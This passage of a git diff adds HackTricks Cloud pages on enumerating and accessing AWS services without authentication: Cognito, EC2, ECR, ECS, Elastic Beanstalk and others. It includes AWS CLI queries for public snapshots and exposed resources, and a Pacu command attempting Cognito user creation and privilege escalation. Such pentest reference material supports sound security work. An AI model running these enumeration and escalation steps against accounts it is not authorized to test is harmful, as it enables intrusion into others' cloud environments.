+By default Cognito allows to **register new user**. Being able to register a user might give you **access** to the **underlaying application** or to the **authenticated IAM access role of an Identity Pool** that is accepting as identity provider the Cognito User Pool. [**Check how to do that here**](../aws-services/aws-cognito-enum/cognito-user-pools.md#registration).
+
+### Pacu modules for pentesting and enumeration
+
+[Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.
+
+For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
+
+#### Usage
+
+Sample `cognito__attack` usage to attempt user creation and all privesc vectors against a given identity pool and user pool client:
+
+```bash
+Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools 
+us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 
+59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX
+```
+
+Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account:
+
+```bash
+Pacu (new:test) > run cognito__enum
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md
new file mode 100644
index 0000000000..89c2f12cd0
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md
@@ -0,0 +1,37 @@
+# AWS - DocumentDB Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Public URL template
+
+```
+<name>.cluster-<random>.<region>.docdb.amazonaws.com
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md
new file mode 100644
index 0000000000..8067c97b0b
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md
@@ -0,0 +1,41 @@
+# AWS - DynamoDB Unauthenticated Access
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Dynamo DB
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-dynamodb-enum.md" %}
+[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md)
+{% endcontent-ref %}
+
+Apart from giving access to all AWS or some compromised external AWS account, or have some SQL injections in an application that communicates with DynamoDB I'm don't know more options to access AWS accounts from DynamoDB.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md
new file mode 100644
index 0000000000..ea692e888e
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md
@@ -0,0 +1,88 @@
+# AWS - EC2 Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## EC2 & Related Services
+
+Check in this page more information about this:
+
+{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %}
+[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/)
+{% endcontent-ref %}
+
+### Public Ports
+
+It's possible to expose the **any port of the virtual machines to the internet**. Depending on **what is running** in the exposed the port an attacker could abuse it.
+
+#### SSRF
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %}
+
+### Public AMIs & EBS Snapshots
+
+AWS allows to **give access to anyone to download AMIs and Snapshots**. You can list these resources very easily from your own account:
+
+{% code overflow="wrap" %}
+```bash
+# Public AMIs
+aws ec2 describe-images --executable-users all
+
+## Search AMI by ownerID
+aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `967541184254/`) == `true`]'
+
+## Search AMI by substr ("shared" in the example)
+aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `shared`) == `true`]'
+
+# Public EBS snapshots (hard-drive copies)
+aws ec2 describe-snapshots --restorable-by-user-ids all
+aws ec2 describe-snapshots --restorable-by-user-ids all | jq '.Snapshots[] | select(.OwnerId == "099720109477")'
+```
+{% endcode %}
+
+If you find a snapshot that is restorable by anyone, make sure to check [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) for directions on downloading and looting the snapshot.
+
+#### Public URL template
+
+```bash
+# EC2
+ec2-{ip-seperated}.compute-1.amazonaws.com
+# ELB
+http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
+https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
+```
+
+### Enumerate EC2 instances with public IP
+
+{% code overflow="wrap" %}
+```bash
+aws ec2 describe-instances --query "Reservations[].Instances[?PublicIpAddress!=null].PublicIpAddress" --output text
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
new file mode 100644
index 0000000000..0e491c74e3
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
@@ -0,0 +1,63 @@
+# AWS - ECR Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## ECR
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-ecr-enum.md" %}
+[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md)
+{% endcontent-ref %}
+
+### Public registry repositories (images)
+
+As mentioned in the ECS Enum section, a public registry is **accessible by anyone** uses the format **`public.ecr.aws/<random>/<name>`**. If a public repository URL is located by an attacker he could **download the image and search for sensitive information** in the metadata and content of the image.
+
+{% code overflow="wrap" %}
+```bash
+aws ecr describe-repositories --query 'repositories[?repositoryUriPublic == `true`].repositoryName' --output text
+```
+{% endcode %}
+
+{% hint style="warning" %}
+This could also happen in **private registries** where a registry policy or a repository policy is **granting access for example to `"AWS": "*"`**. Anyone with an AWS account could access that repo.
+{% endhint %}
+
+### Enumerate Private Repo
+
+The tools [**skopeo**](https://github.com/containers/skopeo) and [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) can be used to list accessible repositories inside a private registry.
+
+```bash
+# Get image names
+skopeo list-tags docker://<PRIVATE_REGISTRY_URL> | grep -oP '(?<=^Name: ).+'
+crane ls <PRIVATE_REGISTRY_URL> | sed 's/ .*//'
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md
new file mode 100644
index 0000000000..1f9e1b97bd
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md
@@ -0,0 +1,53 @@
+# AWS - ECS Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## ECS
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-ecs-enum.md" %}
+[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md)
+{% endcontent-ref %}
+
+### Publicly Accessible Security Group or Load Balancer for ECS Services
+
+A misconfigured security group that **allows inbound traffic from the internet (0.0.0.0/0 or ::/0)** to the Amazon ECS services could expose the AWS resources to attacks.
+
+{% code overflow="wrap" %}
+```bash
+# Example of detecting misconfigured security group for ECS services
+aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contains(IpRanges[].CidrIp, `0.0.0.0/0`) || contains(Ipv6Ranges[].CidrIpv6, `::/0`)]]'
+
+# Example of detecting a publicly accessible load balancer for ECS services
+aws elbv2 describe-load-balancers --query 'LoadBalancers[?Scheme == `internet-facing`]'
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md
new file mode 100644
index 0000000000..8ea519bad6
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md
@@ -0,0 +1,65 @@
+# AWS - Elastic Beanstalk Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Elastic Beanstalk
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %}
+[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md)
+{% endcontent-ref %}
+
+### Web vulnerability
+
+Note that by default Beanstalk environments have the **Metadatav1 disabled**.
+
+The format of the Beanstalk web pages is **`https://<webapp-name>-env.<region>.elasticbeanstalk.com/`**
+
+### Insecure Security Group Rules
+
+Misconfigured security group rules can expose Elastic Beanstalk instances to the public. **Overly permissive ingress rules, such as allowing traffic from any IP address (0.0.0.0/0) on sensitive ports, can enable attackers to access the instance**.
+
+### Publicly Accessible Load Balancer
+
+If an Elastic Beanstalk environment uses a load balancer and the load balancer is configured to be publicly accessible, attackers can **send requests directly to the load balancer**. While this might not be an issue for web applications intended to be publicly accessible, it could be a problem for private applications or environments.
+
+### Publicly Accessible S3 Buckets
+
+Elastic Beanstalk applications are often stored in S3 buckets before deployment. If the S3 bucket containing the application is publicly accessible, an attacker could **download the application code and search for vulnerabilities or sensitive information**.
+
+### Enumerate Public Environments
+
+{% code overflow="wrap" %}
+```bash
+aws elasticbeanstalk describe-environments --query 'Environments[?OptionSettings[?OptionName==`aws:elbv2:listener:80:defaultProcess` && contains(OptionValue, `redirect`)]].{EnvironmentName:EnvironmentName, ApplicationName:ApplicationName, Status:Status}' --output table
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md
new file mode 100644
index 0000000000..0e6f5efc93
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md
@@ -0,0 +1,38 @@
+# AWS - Elasticsearch Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Public URL template
+
+```
+https://vpc-{user_provided}-[random].[region].es.amazonaws.com
+https://search-{user_provided}-[random].[region].es.amazonaws.com
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md
new file mode 100644
index 0000000000..04863b2856
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md
@@ -0,0 +1,205 @@
+# AWS - IAM & STS Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Enumerate Roles & Usernames in an account
+
+### ~~Assume Role Brute-Force~~
+
+{% hint style="danger" %}
+**This technique doesn't work** anymore as if the role exists or not you always get this error:
+
+`An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::947247140022:user/testenv is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::429217632764:role/account-balanceasdas`
+
+You can **test this running**:
+
+`aws sts assume-role --role-arn arn:aws:iam::412345678909:role/superadmin --role-session-name s3-access-example`
+{% endhint %}
+
+Attempting to **assume a role without the necessary permissions** triggers an AWS error message. For instance, if unauthorized, AWS might return:
+
+```ruby
